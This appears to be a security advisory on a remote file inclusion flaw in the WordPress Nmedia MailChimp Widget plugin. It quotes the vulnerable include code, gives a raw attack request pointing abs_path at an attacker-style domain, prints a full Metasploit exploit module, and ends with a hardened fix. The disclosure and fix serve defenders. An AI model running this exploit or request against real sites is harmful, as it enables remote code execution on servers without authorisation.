Advisory
Secunia Advisory SA 49538
Analysis
This is a textbook arbitrary file inclusion vulnerability. The affected file is used to interact with the MailChimp API, but the very first two lines of executable code in /api_mailchimp/postToMailChimp.php accept a caller-supplied path and load a file from it.
```php
$path = $_POST['abs_path'] . 'wp-load.php';
//echo $path; die;
require( $path );
```
The vulnerability can be exploited by making the following request, where the URL points at a server hosting a file called 'wp-load.php' (or anything else that returns PHP code), or by using the proof-of-concept code below.
```http
POST /wordpress/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

abs_path=http://myevildomain.com/
```
Proof of concept code
```ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Nmedia MailChimp Widget "abs_path" Remote File Inclusion Vulnerability',
      'Description'    => %q{
        This module exploits a remote file include execution vulnerability in the
        WordPress Nmedia MailChimp Widget '/api_mailchimp/postToMailChimp.php'
        script. All versions of Nmedia MailChimp Widget up to and including 3.1
        are vulnerable.
      },
      'Author'         => [ 'Charlie Eriksen' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'URL', 'http://secunia.com/advisories/49538/' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Jun 21 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('PHPURI', [ true , "The URI to request", '/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php']),
      ], self.class)
  end

  def php_exploit
    postdata = 'abs_path=' << php_include_url

    print_status("Sending exploit request...")
    response = send_request_raw({
      'global'  => true,
      'method'  => 'POST',
      'uri'     => datastore['PHPURI'],
      'data'    => postdata,
      'headers' =>
        {
          'Content-Type'   => 'application/x-www-form-urlencoded',
          'Content-Length' => postdata.length,
        }
    })

    if response and response.code != 200
      print_error("Got a non-200 response back. The server may not be vulnerable (#{response.code})")
    end

    handler
  end
end
```
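For contrast with the analysis above, here is an added example (not the plugin's or the advisory's code) showing the vulnerable include pattern beside a hardened replacement that locates wp-load.php from the plugin's own directory instead of trusting request data. Remote inclusion over http:// only works when PHP's allow_url_include is enabled, but with it disabled the same parameter still allows inclusion of arbitrary local files, so the fix is to stop deriving the path from the request at all; find_wp_load and load_wordpress_hardened are hypothetical names.

```php
<?php
// Added example, not the plugin's code. Contrasts the include pattern from
// postToMailChimp.php with a replacement that never trusts request data.

// VULNERABLE (the pattern from the analysis): the include path comes straight
// from the POST body. With allow_url_include=On this is remote file inclusion;
// with it Off it is still local file inclusion of any readable file.
function load_wordpress_vulnerable()
{
    $path = $_POST['abs_path'] . 'wp-load.php';
    require( $path );
}

// HARDENED (hypothetical helper): the plugin already knows where it lives, so
// walk up from its own directory until wp-load.php is found. No request data
// participates in building the path.
function find_wp_load($start_dir)
{
    $dir = realpath($start_dir);
    while ($dir !== false) {
        $candidate = $dir . DIRECTORY_SEPARATOR . 'wp-load.php';
        if (is_file($candidate)) {
            return $candidate;
        }
        $parent = dirname($dir);
        if ($parent === $dir) {
            return null; // reached the filesystem root without finding it
        }
        $dir = $parent;
    }
    return null;
}

function load_wordpress_hardened()
{
    $wp_load = find_wp_load(__DIR__);
    if ($wp_load === null) {
        // Fail closed: never fall back to a caller-supplied location.
        http_response_code(500);
        exit('wp-load.php not found');
    }
    require $wp_load;
}
```

If an endpoint genuinely must let the caller choose among files, the request value should be a key into a fixed allowlist of known paths, never a path or path prefix that is concatenated into an include.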